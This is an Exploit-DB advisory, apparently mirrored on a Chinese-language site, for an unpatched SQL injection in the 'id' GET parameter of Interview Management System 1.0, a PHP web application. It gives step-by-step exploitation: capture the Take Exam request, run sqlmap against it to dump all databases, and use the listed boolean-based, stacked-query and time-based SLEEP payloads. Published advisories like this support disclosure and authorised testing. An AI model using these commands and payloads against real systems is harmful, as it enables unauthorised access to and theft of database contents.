Interview Management System 1.0 – ‘id’ SQL Injection

  • 作者: Saeed Bala Ahmed
    日期: 2020-12-17
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49279/
  • # Exploit Title: Interview Management System 1.0 - 'id' SQL Injection
    # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
    # Date: 2020-12-10
    # Google Dork: N/A
    # Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html
    # Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code
    # Affected Version: Version 1
    # Patched Version: Unpatched
    # Category: Web Application
    # Tested on: Parrot OS
    
    Step 1. Login to the application with any verified user credentials
    
    Step 2. Click on View Candidates page and select take exam. If there is no
    candidate, click on "Add New Candidate" page, fill details and add new
    candidate.
    
    Step 3. Click on "Take Exam" and capture the request in burpsuite.
    
    Step 4. Save request and run sqlmap on request file using command " sqlmap
    -r request -p id --time-sec=5 --dbs ".
    
    Step 5. This will inject successfully and you will have an information
    disclosure of all databases contents.
    
    ---
    Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (7913=7913) THEN 1 ELSE (SELECT 5980
    UNION SELECT 3372) END))
    
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=1;SELECT SLEEP(5)#
    
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 6708 FROM (SELECT(SLEEP(5)))QTiW)
    ---